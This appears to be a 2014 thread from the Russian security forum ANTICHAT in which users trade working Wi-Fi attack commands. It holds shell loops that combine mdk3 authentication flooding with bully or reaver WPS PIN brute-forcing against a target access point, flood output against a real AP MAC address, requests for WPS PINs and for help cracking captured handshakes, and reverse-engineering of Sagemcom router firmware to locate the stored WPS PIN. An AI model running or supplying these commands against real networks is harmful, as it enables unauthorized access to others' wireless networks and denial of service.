ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.01.2014, 20:41
|
|
New Member
Регистрация: 26.12.2013
Сообщений: 42
Провел на форуме:
16623
Репутация:
0
|
|
while true
do
timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
sleep 10
timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
sleep 3
done
эта команда от кали линукс а как запустить эту команду в бектреке?
|
|
|
26.01.2014, 11:25
|
|
New Member
Регистрация: 25.10.2012
Сообщений: 82
Провел на форуме:
17712
Репутация:
0
|
|
pin для 10:fe:ed знает кто?
|
|
|
|
26.01.2014, 11:32
|
|
Новичок
Регистрация: 22.01.2014
Сообщений: 23
Провел на форуме:
5794
Репутация:
0
|
|
Сообщение от toro
pin для 10:fe:ed знает кто?
Конкретного пина нет! Алгоритмом 16->10 и его модификациями не вычислить! Ищем зависимость а пока что хендшейки лови =)
|
|
|
|
26.01.2014, 12:44
|
|
New Member
Регистрация: 25.10.2012
Сообщений: 82
Провел на форуме:
17712
Репутация:
0
|
|
Сообщение от Z10Y
Конкретного пина нет! Алгоритмом 16->10 и его модификациями не вычислить! Ищем зависимость а пока что хендшейки лови =)
поймал куда можно обратиться о помощи помочь расшифровать ?
|
|
|
|
26.01.2014, 13:05
|
|
Новичок
Регистрация: 22.01.2014
Сообщений: 23
Провел на форуме:
5794
Репутация:
0
|
|
Сообщение от toro
поймал куда можно обратиться о помощи помочь расшифровать ?
на форуме тема есть... ищи в этом разделе
|
|
|
|
26.01.2014, 13:05
|
|
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729
Репутация:
373
|
|
Сообщение от toro
поймал куда можно обратиться о помощи помочь расшифровать ?
Вот сюда.
|
|
|
|
26.01.2014, 13:45
|
|
Member
Регистрация: 12.11.2012
Сообщений: 105
Провел на форуме:
33155
Репутация:
0
|
|
Сообщение от binarymaster
Сигнал слабый, увеличить задержку перебора.
Если не трудно-объясни какую задержку можно менять и в каких пределах желательно. И ещё-при работе MDK3 переодически пишет, что какая-то частота неизвестная (или не поддерживается) Device is still responding with 2000 clients connected!
Connecting Client: 00:09:5B:02:FF:4C to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:5B:5B:17:08 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 2500 clients connected!
Connecting Client: 00:04:5A:2D:80:1A to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:7C:E9:6D:92 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 3000 clients connected!
Connecting Client: 00:40:01:86:FD:89 to target AP: A0:F3:C1:58:16:50
Packets sent: 3122 - Speed: 231 packets/sec[X] Unknown frequency '-613135872' reported by interface 'mon0'. Это в случае с BULLY. А в случае while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done; получаю как указал в предыдущем сообщении, после которого советуеш увеличить задержку. Заблаговременно спасибо.
|
|
|
|
26.01.2014, 18:16
|
|
Новичок
Регистрация: 22.01.2014
Сообщений: 23
Провел на форуме:
5794
Репутация:
0
|
|
Люди помощь требуется)
вот что надыбал в последней прошивки роутера ростелекома sagemcom
Код:
var WscDevPin = '';
var WscStaPin = '';
var WscMode = '';
var WscIRMode = '';
var WscAPMode = '';
var sessionKey='';
var WscCfgMethod = '';
var WscVer2 = '';
var WscIsForceWpsDisable = '';
var phy = '';
var nmode = '';
var wlWapiAvail = '';
var preAuthMode;
Вот еще!
Значение берется отсюда wlWscDevPin, как сюда проникнуть кто знает? Может быть есть какой нибудь эмулятор роутера, с возможностью менять mac адрес, просто на него запилить эту прошивку и посмотреть как себя поведет) Но ток мне кажется это фантастика) Что делать?) HELP
PS искал подробности о ejGetWl() но безуспешно(
вся прошивка |
|
|
|
26.01.2014, 19:56
|
|
Member
Регистрация: 21.01.2014
Сообщений: 27
Провел на форуме:
7360
Репутация:
1
|
|
Если прошивка на MIPS Linux, можно попробовать на VMWare поставить ..
|
|
|
|
26.01.2014, 20:52
|
|
Постоянный
Регистрация: 30.08.2011
Сообщений: 358
Провел на форуме:
66828
Репутация:
11
|
|
Сообщение от Z10Y
Значение берется отсюда wlWscDevPin, как сюда проникнуть кто знает?
По этой строке ищется файл libwlmngr.so. Там, в функции wlmngr_getVar, пин читается из nvram, он хранится отдельно от мака.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
